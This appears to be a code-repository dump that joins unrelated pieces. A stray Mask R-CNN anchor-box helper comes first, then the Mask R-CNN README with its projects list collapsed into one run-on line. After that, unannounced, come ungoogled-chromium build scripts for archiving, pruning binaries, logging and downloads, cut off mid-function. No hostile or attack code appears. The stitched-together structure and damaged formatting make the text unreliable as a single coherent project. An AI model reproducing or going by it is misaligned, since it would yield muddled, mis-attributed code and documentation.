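def _example_anchor_usage():
    """Illustrative sketch of the anchor and box helpers above.

    The scales, ratios, feature shapes, and strides used here are typical FPN
    settings assumed for demonstration only; in practice they come from the
    Config class (e.g. RPN_ANCHOR_SCALES, BACKBONE_STRIDES).
    """
    # One scale per pyramid level, all ratios at every level
    anchors = generate_pyramid_anchors(
        scales=(32, 64, 128, 256, 512),
        ratios=[0.5, 1, 2],
        feature_shapes=[(256, 256), (128, 128), (64, 64), (32, 32), (16, 16)],
        feature_strides=[4, 8, 16, 32, 64],
        anchor_stride=1)
    # anchors: [N, (y1, x1, y2, x2)] in pixel coordinates of a 1024x1024 image
    normalized = norm_boxes(anchors, shape=(1024, 1024))
    # denorm_boxes() reverses norm_boxes() up to rounding to whole pixels
    restored = denorm_boxes(normalized, shape=(1024, 1024))
    return anchors, normalized, restored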
# Mask R-CNN for Object Detection and Segmentation

This is an implementation of [Mask R-CNN](https://arxiv.org/abs/1703.06870) on Python 3, Keras, and TensorFlow. The model generates bounding boxes and segmentation masks for each instance of an object in the image. It's based on Feature Pyramid Network (FPN) and a ResNet101 backbone.

![Instance Segmentation Sample](assets/street.png)

The repository includes:
* Source code of Mask R-CNN built on FPN and ResNet101.
* Training code for MS COCO
* Pre-trained weights for MS COCO
* Jupyter notebooks to visualize the detection pipeline at every step
* ParallelModel class for multi-GPU training
* Evaluation on MS COCO metrics (AP)
* Example of training on your own dataset

The code is documented and designed to be easy to extend. If you use it in your research, please consider citing this repository (bibtex below). If you work on 3D vision, you might find our recently released [Matterport3D](https://matterport.com/blog/2017/09/20/announcing-matterport3d-research-dataset/) dataset useful as well. This dataset was created from 3D-reconstructed spaces captured by our customers who agreed to make them publicly available for academic use. You can see more examples [here](https://matterport.com/gallery/).

# Getting Started
* [demo.ipynb](samples/demo.ipynb) is the easiest way to start. It shows an example of using a model pre-trained on MS COCO to segment objects in your own images. It includes code to run object detection and instance segmentation on arbitrary images.

* [train_shapes.ipynb](samples/shapes/train_shapes.ipynb) shows how to train Mask R-CNN on your own dataset. This notebook introduces a toy dataset (Shapes) to demonstrate training on a new dataset.

* ([model.py](mrcnn/model.py), [utils.py](mrcnn/utils.py), [config.py](mrcnn/config.py)): These files contain the main Mask R-CNN implementation.

* [inspect_data.ipynb](samples/coco/inspect_data.ipynb). This notebook visualizes the different pre-processing steps to prepare the training data.

* [inspect_model.ipynb](samples/coco/inspect_model.ipynb) This notebook goes in depth into the steps performed to detect and segment objects. It provides visualizations of every step of the pipeline.

* [inspect_weights.ipynb](samples/coco/inspect_weights.ipynb) This notebook inspects the weights of a trained model and looks for anomalies and odd patterns.

# Step by Step Detection
To help with debugging and understanding the model, there are 3 notebooks ([inspect_data.ipynb](samples/coco/inspect_data.ipynb), [inspect_model.ipynb](samples/coco/inspect_model.ipynb), [inspect_weights.ipynb](samples/coco/inspect_weights.ipynb)) that provide a lot of visualizations and allow running the model step by step to inspect the output at each point. Here are a few examples:

## 1. Anchor sorting and filtering
Visualizes every step of the first stage Region Proposal Network and displays positive and negative anchors along with anchor box refinement.
![](assets/detection_anchors.png)

## 2. Bounding Box Refinement
This is an example of final detection boxes (dotted lines) and the refinement applied to them (solid lines) in the second stage.
![](assets/detection_refinement.png)

## 3. Mask Generation
Examples of generated masks. These then get scaled and placed on the image in the right location.
![](assets/detection_masks.png)

## 4. Layer activations
Often it's useful to inspect the activations at different layers to look for signs of trouble (all zeros or random noise).
![](assets/detection_activations.png)

## 5. Weight Histograms
Another useful debugging tool is to inspect the weight histograms. These are included in the inspect_weights.ipynb notebook.
![](assets/detection_histograms.png)

## 6. Logging to TensorBoard
TensorBoard is another great debugging and visualization tool. The model is configured to log losses and save weights at the end of every epoch.
![](assets/detection_tensorboard.png)

## 7. Composing the different pieces into a final result
![](assets/detection_final.png)

# Training on MS COCO
We're providing pre-trained weights for MS COCO to make it easier to start. You can use those weights as a starting point to train your own variation on the network. Training and evaluation code is in `samples/coco/coco.py`. You can import this module in a Jupyter notebook (see the provided notebooks for examples) or you can run it directly from the command line as such:

```
# Train a new model starting from pre-trained COCO weights
python3 samples/coco/coco.py train --dataset=/path/to/coco/ --model=coco

# Train a new model starting from ImageNet weights
python3 samples/coco/coco.py train --dataset=/path/to/coco/ --model=imagenet

# Continue training a model that you had trained earlier
python3 samples/coco/coco.py train --dataset=/path/to/coco/ --model=/path/to/weights.h5

# Continue training the last model you trained. This will find
# the last trained weights in the model directory.
python3 samples/coco/coco.py train --dataset=/path/to/coco/ --model=last
```

You can also run the COCO evaluation code with:
```
# Run COCO evaluation on the last trained model
python3 samples/coco/coco.py evaluate --dataset=/path/to/coco/ --model=last
```

The training schedule, learning rate, and other parameters should be set in `samples/coco/coco.py`.

# Training on Your Own Dataset

Start by reading this [blog post about the balloon color splash sample](https://engineering.matterport.com/splash-of-color-instance-segmentation-with-mask-r-cnn-and-tensorflow-7c761e238b46). It covers the process starting from annotating images to training to using the results in a sample application.

In summary, to train the model on your own dataset you'll need to extend two classes:

```Config```
This class contains the default configuration. Subclass it and modify the attributes you need to change.

```Dataset```
This class provides a consistent way to work with any dataset. It allows you to use new datasets for training without having to change the code of the model. It also supports loading multiple datasets at the same time, which is useful if the objects you want to detect are not all available in one dataset.

See examples in `samples/shapes/train_shapes.ipynb`, `samples/coco/coco.py`, `samples/balloon/balloon.py`, and `samples/nucleus/nucleus.py`. A minimal sketch of both subclasses is also included at the end of this README.

## Differences from the Official Paper
This implementation follows the Mask R-CNN paper for the most part, but there are a few cases where we deviated in favor of code simplicity and generalization. These are some of the differences we're aware of. If you encounter other differences, please do let us know.

* **Image Resizing:** To support training multiple images per batch we resize all images to the same size. For example, 1024x1024px on MS COCO. We preserve the aspect ratio, so if an image is not square we pad it with zeros. In the paper the resizing is done such that the smallest side is 800px and the largest is trimmed at 1000px.
* **Bounding Boxes**: Some datasets provide bounding boxes and some provide masks only.
To support training on multiple datasets we opted to ignore the bounding boxes that come with the dataset and generate them on the fly instead. We pick the smallest box that encapsulates all the pixels of the mask as the bounding box. This simplifies the implementation and also makes it easy to apply image augmentations that would otherwise be harder to apply to bounding boxes, such as image rotation. To validate this approach, we compared our computed bounding boxes to those provided by the COCO dataset. We found that ~2% of bounding boxes differed by 1px or more, ~0.05% differed by 5px or more, and only 0.01% differed by 10px or more.
* **Learning Rate:** The paper uses a learning rate of 0.02, but we found it to be too high; it often causes the weights to explode, especially when using a small batch size. It might be related to differences between how Caffe and TensorFlow compute gradients (sum vs mean across batches and GPUs). Or, maybe the official model uses gradient clipping to avoid this issue. We do use gradient clipping, but don't set it too aggressively. We found that smaller learning rates converge faster anyway, so we go with that.

## Citation
Use this bibtex to cite this repository:
```
@misc{matterport_maskrcnn_2017,
  title={Mask R-CNN for object detection and instance segmentation on Keras and TensorFlow},
  author={Waleed Abdulla},
  year={2017},
  publisher={Github},
  journal={GitHub repository},
  howpublished={\url{https://github.com/matterport/Mask_RCNN}},
}
```

## Contributing
Contributions to this repository are welcome. Examples of things you can contribute:
* Speed Improvements. Like re-writing some Python code in TensorFlow or Cython.
* Training on other datasets.
* Accuracy Improvements.
* Visualizations and examples.

You can also [join our team](https://matterport.com/careers/) and help us build even more projects like this one.

## Requirements
Python 3.4, TensorFlow 1.3, Keras 2.0.8 and other common packages listed in `requirements.txt`.

### MS COCO Requirements:
To train or test on MS COCO, you'll also need:
* pycocotools (installation instructions below)
* [MS COCO Dataset](http://cocodataset.org/#home)
* Download the 5K [minival](https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0) and the 35K [validation-minus-minival](https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0) subsets. More details in the original [Faster R-CNN implementation](https://github.com/rbgirshick/py-faster-rcnn/blob/master/data/README.md).

If you use Docker, the code has been verified to work on [this Docker container](https://hub.docker.com/r/waleedka/modern-deep-learning/).

## Installation
1. Clone this repository
2. Install dependencies
   ```bash
   pip3 install -r requirements.txt
   ```
3. Run setup from the repository root directory
   ```bash
   python3 setup.py install
   ```
4. Download pre-trained COCO weights (mask_rcnn_coco.h5) from the [releases page](https://github.com/matterport/Mask_RCNN/releases).
5. (Optional) To train or test on MS COCO install `pycocotools` from one of these repos. They are forks of the original pycocotools with fixes for Python3 and Windows (the official repo doesn't seem to be active anymore).
    * Linux: https://github.com/waleedka/coco
    * Windows: https://github.com/philferriere/cocoapi.
You must have the Visual C++ 2015 build tools on your path (see the repo for additional details) # Projects Using this Model If you extend this model to other datasets or build projects that use it, we'd love to hear from you. ### [4K Video Demo](https://www.youtube.com/watch?v=OOT3UIXZztE) by Karol Majek. [![Mask RCNN on 4K Video](assets/4k_video.gif)](https://www.youtube.com/watch?v=OOT3UIXZztE) ### [Images to OSM](https://github.com/jremillard/images-to-osm): Improve OpenStreetMap by adding baseball, soccer, tennis, football, and basketball fields. ![Identify sport fields in satellite images](assets/images_to_osm.png) ### [Splash of Color](https://engineering.matterport.com/splash-of-color-instance-segmentation-with-mask-r-cnn-and-tensorflow-7c761e238b46). A blog post explaining how to train this model from scratch and use it to implement a color splash effect. ![Balloon Color Splash](assets/balloon_color_splash.gif) ### [Segmenting Nuclei in Microscopy Images](samples/nucleus). Built for the [2018 Data Science Bowl](https://www.kaggle.com/c/data-science-bowl-2018) Code is in the `samples/nucleus` directory. ![Nucleus Segmentation](assets/nucleus_segmentation.png) ### [Detection and Segmentation for Surgery Robots](https://github.com/SUYEgit/Surgery-Robot-Detection-Segmentation) by the NUS Control & Mechatronics Lab. ![Surgery Robot Detection and Segmentation](https://github.com/SUYEgit/Surgery-Robot-Detection-Segmentation/raw/master/assets/video.gif) ### [Reconstructing 3D buildings from aerial LiDAR](https://medium.com/geoai/reconstructing-3d-buildings-from-aerial-lidar-with-ai-details-6a81cb3079c0) A proof of concept project by [Esri](https://www.esri.com/), in collaboration with Nvidia and Miami-Dade County. Along with a great write up and code by Dmitry Kudinov, Daniel Hedges, and Omar Maher. ![3D Building Reconstruction](assets/project_3dbuildings.png) ### [Usiigaci: Label-free Cell Tracking in Phase Contrast Microscopy](https://github.com/oist/usiigaci) A project from Japan to automatically track cells in a microfluidics platform. Paper is pending, but the source code is released. ![](assets/project_usiigaci1.gif) ![](assets/project_usiigaci2.gif) ### [Characterization of Arctic Ice-Wedge Polygons in Very High Spatial Resolution Aerial Imagery](http://www.mdpi.com/2072-4292/10/9/1487) Research project to understand the complex processes between degradations in the Arctic and climate change. By Weixing Zhang, Chandi Witharana, Anna Liljedahl, and Mikhail Kanevskiy. ![image](assets/project_ice_wedge_polygons.png) ### [Mask-RCNN Shiny](https://github.com/huuuuusy/Mask-RCNN-Shiny) A computer vision class project by HU Shiyu to apply the color pop effect on people with beautiful results. ![](assets/project_shiny1.jpg) ### [Mapping Challenge](https://github.com/crowdAI/crowdai-mapping-challenge-mask-rcnn): Convert satellite imagery to maps for use by humanitarian organisations. ![Mapping Challenge](assets/mapping_challenge.png) ### [GRASS GIS Addon](https://github.com/ctu-geoforall-lab/i.ann.maskrcnn) to generate vector masks from geospatial imagery. Based on a [Master's thesis](https://github.com/ctu-geoforall-lab-projects/dp-pesek-2018) by Ondřej Pešek. ![GRASS GIS Image](assets/project_grass_gis.png)
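
## Extending Config and Dataset: a minimal sketch

To make the *Training on Your Own Dataset* section above more concrete, here is a minimal sketch of the two subclasses it describes. The class names, the `"custom"` source tag, the single `"object"` class, and the `.masks.npy` file layout are placeholders chosen for illustration only; adapt them to your data and see `samples/balloon/balloon.py` for a complete, working example.

```python
import numpy as np
from pathlib import Path

from mrcnn.config import Config
from mrcnn import utils


class CustomConfig(Config):
    NAME = "custom"
    IMAGES_PER_GPU = 1
    NUM_CLASSES = 1 + 1       # background + one object class
    STEPS_PER_EPOCH = 100


class CustomDataset(utils.Dataset):
    def load_custom(self, dataset_dir):
        # Register the class and every image in the directory
        self.add_class("custom", 1, "object")
        for i, image_path in enumerate(sorted(Path(dataset_dir).glob("*.jpg"))):
            self.add_image("custom", image_id=i, path=str(image_path))

    def load_mask(self, image_id):
        # Hypothetical layout: instance masks stored next to each image as
        # <image>.jpg.masks.npy with shape [height, width, instance_count]
        info = self.image_info[image_id]
        masks = np.load(info["path"] + ".masks.npy").astype(bool)
        class_ids = np.ones([masks.shape[-1]], dtype=np.int32)  # all class 1
        return masks, class_ids
```

A dataset prepared this way is used like the ones in the samples: instantiate it, call the loader method, then call `prepare()` before passing it to the training code.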
ungoogled-chromium
1b11ca4600fc48faaa77260d53e20e259c0ee180
File: utils/filescfg.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Operations with FILES.cfg (for portable packages) """ import argparse import platform import sys import tarfile import zipfile from pathlib import Path from _common import get_logger, add_common_params def filescfg_generator(cfg_path, build_outputs, cpu_arch): """ Generator that yields pathlib.Path relative to the build outputs according to FILES.cfg cfg_path is a pathlib.Path to the FILES.cfg build_outputs is a pathlib.Path to the build outputs directory. cpu_arch is a platform.architecture() string """ resolved_build_outputs = build_outputs.resolve() exec_globals = {'__builtins__': None} with cfg_path.open() as cfg_file: exec(cfg_file.read(), exec_globals) # pylint: disable=exec-used for file_spec in exec_globals['FILES']: # Only include files for official builds if 'official' not in file_spec['buildtype']: continue # If a file has an 'arch' field, it must have cpu_arch to be included if 'arch' in file_spec and cpu_arch not in file_spec['arch']: continue # From chrome/tools/build/make_zip.py, 'filename' is actually a glob pattern for file_path in resolved_build_outputs.glob(file_spec['filename']): # Do not package Windows debugging symbols if file_path.suffix.lower() == '.pdb': continue yield file_path.relative_to(resolved_build_outputs) def _get_archive_writer(output_path): """ Detects and returns the appropriate archive writer output_path is the pathlib.Path of the archive to write """ if not output_path.suffixes: raise ValueError('Output name has no suffix: %s' % output_path.name) if output_path.suffixes[-1].lower() == '.zip': archive_root = Path(output_path.stem) output_archive = zipfile.ZipFile(str(output_path), 'w', zipfile.ZIP_DEFLATED) def add_func(in_path, arc_path): """Add files to zip archive""" if in_path.is_dir(): for sub_path in in_path.rglob('*'): output_archive.write(str(sub_path), str(arc_path / sub_path.relative_to(in_path))) else: output_archive.write(str(in_path), str(arc_path)) elif '.tar' in output_path.name.lower(): if len(output_path.suffixes) >= 2 and output_path.suffixes[-2].lower() == '.tar': tar_mode = 'w:%s' % output_path.suffixes[-1][1:] archive_root = Path(output_path.with_suffix('').stem) elif output_path.suffixes[-1].lower() == '.tar': tar_mode = 'w' archive_root = Path(output_path.stem) else: raise ValueError('Could not detect tar format for output: %s' % output_path.name) output_archive = tarfile.open(str(output_path), tar_mode) add_func = lambda in_path, arc_path: output_archive.add(str(in_path), str(arc_path)) else: raise ValueError('Unknown archive extension with name: %s' % output_path.name) return output_archive, add_func, archive_root def create_archive(file_iter, include_iter, build_outputs, output_path): """ Create an archive of the build outputs. Supports zip and compressed tar archives. file_iter is an iterable of files to include in the zip archive. output_path is the pathlib.Path to write the new zip archive. 
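    include_iter is an iterable of additional file or directory paths to copy into the root of the archive.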
build_outputs is a pathlib.Path to the build outputs """ output_archive, add_func, archive_root = _get_archive_writer(output_path) with output_archive: for relative_path in file_iter: add_func(build_outputs / relative_path, archive_root / relative_path) for include_path in include_iter: add_func(include_path, archive_root / include_path.name) def _files_generator_by_args(args): """Returns a files_generator() instance from the CLI args""" # --build-outputs if not args.build_outputs.exists(): get_logger().error('Could not find build outputs: %s', args.build_outputs) raise FileNotFoundError(args.build_outputs) # --cfg if not args.cfg.exists(): get_logger().error('Could not find FILES.cfg at %s', args.cfg) raise FileNotFoundError(args.cfg) return filescfg_generator(args.cfg, args.build_outputs, args.cpu_arch) def _list_callback(args): """List files needed to run Chromium.""" sys.stdout.writelines('%s\n' % x for x in _files_generator_by_args(args)) def _archive_callback(args): """ Create an archive of the build outputs. Supports zip and compressed tar archives. """ create_archive(filescfg_generator(args.cfg, args.build_outputs, args.cpu_arch), args.include, args.build_outputs, args.output) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() parser.add_argument('-c', '--cfg', metavar='PATH', type=Path, required=True, help=('The FILES.cfg to use. They are usually located under a ' 'directory in chrome/tools/build/ of the source tree.')) parser.add_argument('--build-outputs', metavar='PATH', type=Path, default='out/Default', help=('The path to the build outputs directory relative to the ' 'source tree. Default: %(default)s')) parser.add_argument('--cpu-arch', metavar='ARCH', default=platform.architecture()[0], choices=('64bit', '32bit'), help=('Filter build outputs by a target CPU. ' 'This is the same as the "arch" key in FILES.cfg. ' 'Default (from platform.architecture()): %(default)s')) add_common_params(parser) subparsers = parser.add_subparsers(title='filescfg actions') # list list_parser = subparsers.add_parser('list', help=_list_callback.__doc__) list_parser.set_defaults(callback=_list_callback) # archive archive_parser = subparsers.add_parser('archive', help=_archive_callback.__doc__) archive_parser.add_argument( '-o', '--output', type=Path, metavar='PATH', required=True, help=('The output path for the archive. The type of archive is selected' ' by the file extension. Currently supported types: .zip and' ' .tar.{gz,bz2,xz}')) archive_parser.add_argument( '-i', '--include', type=Path, metavar='PATH', action='append', default=[], help=('File or directory to include in the root of the archive. Specify ' 'multiple times to include multiple different items. ' 'For zip files, these contents must only be regular files.')) archive_parser.set_defaults(callback=_archive_callback) args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/prune_binaries.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. 
"""Prune binaries from the source tree""" import argparse import sys import os import stat from pathlib import Path from _common import ENCODING, get_logger, add_common_params # List of paths to prune if they exist, excluded from domain_substitution and pruning lists # These allow the lists to be compatible between cloned and tarball sources CONTINGENT_PATHS = ( # Overridable git sources 'third_party/angle/third_party/VK-GL-CTS/src/', 'third_party/instrumented_libs/', # CIPD sources 'buildtools/linux64/', 'buildtools/reclient/', 'third_party/apache-linux/', 'third_party/checkstyle/', 'third_party/google-java-format/', 'third_party/libei/', 'third_party/ninja/', 'third_party/screen-ai/', 'third_party/siso/', 'third_party/updater/chrome_linux64/', 'third_party/updater/chromium_linux64/', 'tools/luci-go/', 'tools/resultdb/', 'tools/skia_goldctl/linux/', # GCS sources 'base/tracing/test/data', 'build/linux/debian_bullseye_amd64-sysroot/', 'build/linux/debian_bullseye_i386-sysroot/', 'buildtools/linux64-format/', 'third_party/blink/renderer/core/css/perftest_data/', 'third_party/js_code_coverage/', 'third_party/llvm-build/Release+Asserts/', 'third_party/node/linux/', 'third_party/opus/tests/resources/', 'third_party/rust-toolchain/', 'third_party/subresource-filter-ruleset/data', 'third_party/test_fonts/test_fonts', 'third_party/tfhub_models/testdata/', 'tools/perf/page_sets/maps_perf_test/dataset/', ) def prune_files(unpack_root, prune_list): """ Delete files under unpack_root listed in prune_list. Returns an iterable of unremovable files. unpack_root is a pathlib.Path to the directory to be pruned prune_list is an iterable of files to be removed. """ unremovable_files = set() for relative_file in prune_list: file_path = unpack_root / relative_file try: file_path.unlink() # read-only files can't be deleted on Windows # so remove the flag and try again. except PermissionError: os.chmod(file_path, stat.S_IWRITE) file_path.unlink() except FileNotFoundError: unremovable_files.add(Path(relative_file).as_posix()) return unremovable_files def _prune_path(path): """ Delete all files and directories in path. path is a pathlib.Path to the directory to be pruned """ for node in sorted(path.rglob('*'), key=lambda l: len(str(l)), reverse=True): if node.is_file() or node.is_symlink(): try: node.unlink() except PermissionError: node.chmod(stat.S_IWRITE) node.unlink() elif node.is_dir() and not any(node.iterdir()): try: node.rmdir() except PermissionError: node.chmod(stat.S_IWRITE) node.rmdir() def prune_dirs(unpack_root, keep_contingent_paths, sysroot): """ Delete all files and directories in pycache and CONTINGENT_PATHS directories. 
unpack_root is a pathlib.Path to the source tree keep_contingent_paths is a boolean that determines if the contingent paths should be pruned sysroot is a string that optionally defines a sysroot to exempt from pruning """ for pycache in unpack_root.rglob('__pycache__'): _prune_path(pycache) if keep_contingent_paths: get_logger().info('Keeping Contingent Paths') else: get_logger().info('Removing Contingent Paths') for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: get_logger().info('%s: %s', 'Exempt', cpath) continue get_logger().info('%s: %s', 'Exists' if Path(cpath).exists() else 'Absent', cpath) _prune_path(unpack_root / cpath) def _callback(args): if not args.directory.exists(): get_logger().error('Specified directory does not exist: %s', args.directory) sys.exit(1) if not args.pruning_list.exists(): get_logger().error('Could not find the pruning list: %s', args.pruning_list) prune_dirs(args.directory, args.keep_contingent_paths, args.sysroot) prune_list = tuple(filter(len, args.pruning_list.read_text(encoding=ENCODING).splitlines())) unremovable_files = prune_files(args.directory, prune_list) if unremovable_files: get_logger().error('%d files could not be pruned.', len(unremovable_files)) get_logger().debug('Files could not be pruned:\n%s', '\n'.join(f for f in unremovable_files)) sys.exit(1) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() parser.add_argument('directory', type=Path, help='The directory to apply binary pruning.') parser.add_argument('pruning_list', type=Path, help='Path to pruning.list') parser.add_argument('--keep-contingent-paths', action='store_true', help=('Skip pruning the contingent paths. ' 'Useful when building with the Google tooling is desired.')) parser.add_argument('--sysroot', choices=('amd64', 'i386'), help=('Skip pruning the sysroot for the specified architecture. ' 'Not needed when --keep-contingent-paths is used.')) add_common_params(parser) parser.set_defaults(callback=_callback) args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/_common.py # -*- coding: UTF-8 -*- # Copyright (c) 2020 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. 
"""Common code and constants""" import argparse import enum import logging import platform from pathlib import Path # Constants ENCODING = 'UTF-8' # For config files and patches USE_REGISTRY = '_use_registry' LOGGER_NAME = 'ungoogled' # Public classes class PlatformEnum(enum.Enum): """Enum for platforms that need distinction for certain functionality""" UNIX = 'unix' # Currently covers anything that isn't Windows WINDOWS = 'windows' class ExtractorEnum: #pylint: disable=too-few-public-methods """Enum for extraction binaries""" SEVENZIP = '7z' TAR = 'tar' WINRAR = 'winrar' class SetLogLevel(argparse.Action): #pylint: disable=too-few-public-methods """Sets logging level based on command line arguments it receives""" def __init__(self, option_strings, dest, nargs=None, **kwargs): super().__init__(option_strings, dest, nargs=nargs, **kwargs) def __call__(self, parser, namespace, value, option_string=None): if option_string in ('--verbose', '-v'): value = logging.DEBUG elif option_string in ('--quiet', '-q'): value = logging.ERROR else: levels = { 'FATAL': logging.FATAL, 'ERROR': logging.ERROR, 'WARNING': logging.WARNING, 'INFO': logging.INFO, 'DEBUG': logging.DEBUG } value = levels[value] set_logging_level(value) # Public methods def get_logger(initial_level=logging.INFO): """Gets the named logger""" logger = logging.getLogger(LOGGER_NAME) if logger.level == logging.NOTSET: logger.setLevel(initial_level) if not logger.hasHandlers(): console_handler = logging.StreamHandler() console_handler.setLevel(initial_level) format_string = '%(levelname)s: %(message)s' formatter = logging.Formatter(format_string) console_handler.setFormatter(formatter) logger.addHandler(console_handler) return logger def set_logging_level(logging_level): """Sets logging level of logger and all its handlers""" if not logging_level: logging_level = logging.INFO logger = get_logger() logger.setLevel(logging_level) if logger.hasHandlers(): for hdlr in logger.handlers: hdlr.setLevel(logging_level) return logger def get_running_platform(): """ Returns a PlatformEnum value indicating the platform that utils is running on. NOTE: Platform detection should only be used when no cross-platform alternative is available. """ uname = platform.uname() # detect native python and WSL if uname.system == 'Windows' or 'Microsoft' in uname.release: return PlatformEnum.WINDOWS # Only Windows and UNIX-based platforms need to be distinguished right now. return PlatformEnum.UNIX def get_chromium_version(): """Returns the Chromium version.""" return (Path(__file__).parent.parent / 'chromium_version.txt').read_text().strip() def parse_series(series_path): """ Returns an iterator of paths over the series file series_path is a pathlib.Path to the series file """ with series_path.open(encoding=ENCODING) as series_file: series_lines = series_file.read().splitlines() # Filter blank lines series_lines = filter(len, series_lines) # Filter comment lines series_lines = filter((lambda x: not x.startswith('#')), series_lines) # Strip in-line comments series_lines = map((lambda x: x.strip().split(' #')[0]), series_lines) return series_lines def add_common_params(parser): """ Adds common command line arguments to a parser. """ # Logging levels logging_group = parser.add_mutually_exclusive_group() logging_group.add_argument( '--log-level', action=SetLogLevel, choices=['FATAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'], help="Set logging level of current script. 
Only one of 'log-level', 'verbose'," " 'quiet' can be set at a time.") logging_group.add_argument( '--quiet', '-q', action=SetLogLevel, nargs=0, help="Display less outputs to console. Only one of 'log-level', 'verbose'," " 'quiet' can be set at a time.") logging_group.add_argument( '--verbose', '-v', action=SetLogLevel, nargs=0, help="Increase logging verbosity to include DEBUG messages. Only one of " "'log-level', 'verbose', 'quiet' can be set at a time.") File: utils/__init__.py File: utils/downloads.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Module for the downloading, checking, and unpacking of necessary files into the source tree. """ import argparse import configparser import enum import hashlib import shutil import ssl import subprocess import sys import urllib.request from pathlib import Path from _common import ENCODING, USE_REGISTRY, ExtractorEnum, get_logger, \ get_chromium_version, add_common_params from _extraction import extract_tar_file, extract_with_7z, extract_with_winrar sys.path.insert(0, str(Path(__file__).parent / 'third_party')) import schema #pylint: disable=wrong-import-position, wrong-import-order sys.path.pop(0) # Constants class HashesURLEnum(str, enum.Enum): """Enum for supported hash URL schemes""" CHROMIUM = 'chromium' class HashMismatchError(BaseException): """Exception for computed hashes not matching expected hashes""" class DownloadInfo: #pylint: disable=too-few-public-methods """Representation of an downloads.ini file for downloading files""" _hashes = ('md5', 'sha1', 'sha256', 'sha512') hash_url_delimiter = '|' _nonempty_keys = ('url', 'download_filename') _optional_keys = ( 'version', 'strip_leading_dirs', ) _passthrough_properties = (*_nonempty_keys, *_optional_keys, 'extractor', 'output_path') _ini_vars = { '_chromium_version': get_chromium_version(), } @staticmethod def _is_hash_url(value): return value.count(DownloadInfo.hash_url_delimiter) == 2 and value.split( DownloadInfo.hash_url_delimiter)[0] in iter(HashesURLEnum) _schema = schema.Schema({ schema.Optional(schema.And(str, len)): { **{x: schema.And(str, len) for x in _nonempty_keys}, 'output_path': (lambda x: str(Path(x).relative_to(''))), **{schema.Optional(x): schema.And(str, len) for x in _optional_keys}, schema.Optional('extractor'): schema.Or(ExtractorEnum.TAR, ExtractorEnum.SEVENZIP, ExtractorEnum.WINRAR), schema.Optional(schema.Or(*_hashes)): schema.And(str, len), schema.Optional('hash_url'): lambda x: DownloadInfo._is_hash_url(x), #pylint: disable=unnecessary-lambda } }) class _DownloadsProperties: #pylint: disable=too-few-public-methods def __init__(self, section_dict, passthrough_properties, hashes): self._section_dict = section_dict self._passthrough_properties = passthrough_properties self._hashes = hashes def has_hash_url(self): """ Returns a boolean indicating whether the current download has a hash URL""" return 'hash_url' in self._section_dict def __getattr__(self, name): if name in self._passthrough_properties: return self._section_dict.get(name, fallback=None) if name == 'hashes': hashes_dict = {} for hash_name in (*self._hashes, 'hash_url'): value = self._section_dict.get(hash_name, fallback=None) if value: if hash_name == 'hash_url': value = value.split(DownloadInfo.hash_url_delimiter) hashes_dict[hash_name] = value return hashes_dict raise AttributeError('"{}" has no attribute 
"{}"'.format(type(self).__name__, name)) def _parse_data(self, path): """ Parses an INI file located at path Raises schema.SchemaError if validation fails """ def _section_generator(data): for section in data: if section == configparser.DEFAULTSECT: continue yield section, dict( filter(lambda x: x[0] not in self._ini_vars, data.items(section))) new_data = configparser.ConfigParser(defaults=self._ini_vars) with path.open(encoding=ENCODING) as ini_file: new_data.read_file(ini_file, source=str(path)) try: self._schema.validate(dict(_section_generator(new_data))) except schema.SchemaError as exc: get_logger().error('downloads.ini failed schema validation (located in %s)', path) raise exc return new_data def __init__(self, ini_paths): """Reads an iterable of pathlib.Path to download.ini files""" self._data = configparser.ConfigParser() for path in ini_paths: self._data.read_dict(self._parse_data(path)) def __getitem__(self, section): """ Returns an object with keys as attributes and values already pre-processed strings """ return self._DownloadsProperties(self._data[section], self._passthrough_properties, self._hashes) def __contains__(self, item): """ Returns True if item is a name of a section; False otherwise. """ return self._data.has_section(item) def __iter__(self): """Returns an iterator over the section names""" return iter(self._data.sections()) def properties_iter(self): """Iterator for the download properties sorted by output path""" return sorted(map(lambda x: (x, self[x]), self), key=(lambda x: str(Path(x[1].output_path)))) class _UrlRetrieveReportHook: #pylint: disable=too-few-public-methods """Hook for urllib.request.urlretrieve to log progress information to console""" def __init__(self): self._max_len_printed = 0 self._last_percentage = None def __call__(self, block_count, block_size, total_size): # Use total_blocks to handle case total_size < block_size # total_blocks is ceiling of total_size / block_size # Ceiling division from: https://stackoverflow.com/a/17511341 total_blocks = -(-total_size // block_size) if total_blocks > 0: # Do not needlessly update the console. Since the console is # updated synchronously, we don't want updating the console to # bottleneck downloading. Thus, only refresh the output when the # displayed value should change. 
